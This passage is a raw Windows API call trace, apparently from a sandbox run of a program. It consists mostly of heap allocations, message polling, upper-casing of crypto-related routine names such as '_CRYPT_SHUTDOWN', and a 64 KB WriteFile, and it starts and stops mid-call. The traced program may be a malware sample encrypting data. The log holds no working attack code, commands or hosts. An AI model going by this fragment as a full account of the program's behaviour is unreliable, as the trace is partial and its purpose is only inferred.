lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0139.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0139.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0139.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0139.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69888 [0139.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0139.018] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0139.018] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0139.018] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69888 | out: hHeap=0x970000) returned 1 [0139.018] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0139.018] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0139.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0139.018] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0139.018] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0139.018] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0139.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0139.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0139.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0139.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0139.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0139.019] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0139.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0139.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0139.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0139.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0139.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0139.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0139.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0139.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0139.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0139.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0139.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0139.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0139.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0139.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xfff0) returned 0x2ea0320 [0139.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0139.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0139.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0139.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0139.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0139.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0139.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0139.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0139.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0139.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0139.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0139.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0139.177] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xfff0) returned 0x2eb0318 [0139.178] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ea0320 | out: hHeap=0x970000) returned 1 [0139.178] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0139.178] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0139.178] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0139.179] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0139.179] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0139.179] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0139.179] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0139.179] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0139.179] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c08 [0139.179] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0139.179] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0139.179] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0139.179] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0139.179] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0139.179] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0139.179] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0139.179] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0139.179] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0139.179] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50938 [0139.179] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0139.179] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0139.179] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e801e8 [0139.179] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0139.179] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0139.179] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e801e8 | out: hHeap=0x970000) returned 1 [0139.179] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0139.179] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50848 [0139.179] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0139.179] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0139.179] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0139.180] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0139.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0139.180] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0139.180] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0139.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0139.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0139.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0139.180] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0139.180] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50968 [0139.180] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0139.180] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e509b0 [0139.180] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50860 [0139.180] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506c8 [0139.180] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0139.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0139.180] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50878 [0139.180] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506e0 [0139.180] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50740 [0139.180] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0139.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0139.180] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0139.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0139.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0139.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0139.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0139.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0139.181] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0139.181] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0139.181] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0139.181] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0139.181] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0139.181] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0139.181] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0139.181] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0139.181] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0139.181] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0139.181] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ffb8 [0139.181] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0139.181] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0139.181] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ffb8 | out: hHeap=0x970000) returned 1 [0139.181] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0139.181] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506c8 [0139.181] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0139.181] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0139.181] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0139.181] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0139.181] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0139.181] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0139.181] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0139.181] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0139.181] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0139.181] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0139.182] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0139.182] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0139.182] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0139.182] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0139.182] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0139.182] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0139.182] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0139.182] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0139.182] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0139.182] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0139.182] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0139.182] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0139.182] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0139.182] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0139.182] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0139.182] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0139.182] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0139.182] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0139.182] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0139.182] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0139.182] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0139.182] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xfff0) returned 0x2ea0320 [0139.182] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0139.182] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0139.182] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xfff0) returned 0x2ec0310 [0139.184] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0139.184] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0139.184] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ea0320 | out: hHeap=0x970000) returned 1 [0139.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0139.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0139.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0139.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0139.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0139.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xfff0) returned 0x2ea0320 [0139.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ec0310 | out: hHeap=0x970000) returned 1 [0139.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0139.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0139.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xfff0) returned 0x2ec0310 [0139.209] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ea0320 | out: hHeap=0x970000) returned 1 [0139.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0139.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0139.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0139.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0139.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0139.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0139.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0139.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0139.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0139.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0139.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0139.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0139.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0139.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977998 | out: hHeap=0x970000) returned 1 [0139.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0139.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0139.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0139.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0139.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0139.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0139.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0139.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0139.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0139.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0139.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0139.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0139.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0139.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0139.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0139.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0139.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0139.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977db8 | out: hHeap=0x970000) returned 1 [0139.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0139.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e90328 | out: hHeap=0x970000) returned 1 [0139.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0139.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0139.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0139.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0139.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0139.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0139.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0139.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0139.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0139.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0139.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0139.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0139.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0139.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0139.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0139.213] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0139.221] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0139.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0139.221] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0139.221] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0139.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0139.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0139.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0139.222] WriteFile (in: hFile=0x2d0, lpBuffer=0x2f35010*, nNumberOfBytesToWrite=0xfff0, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2f35010*, lpNumberOfBytesWritten=0x8cf5e4*=0xfff0, lpOverlapped=0x0) returned 1 [0139.225] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0139.225] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0139.225] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, 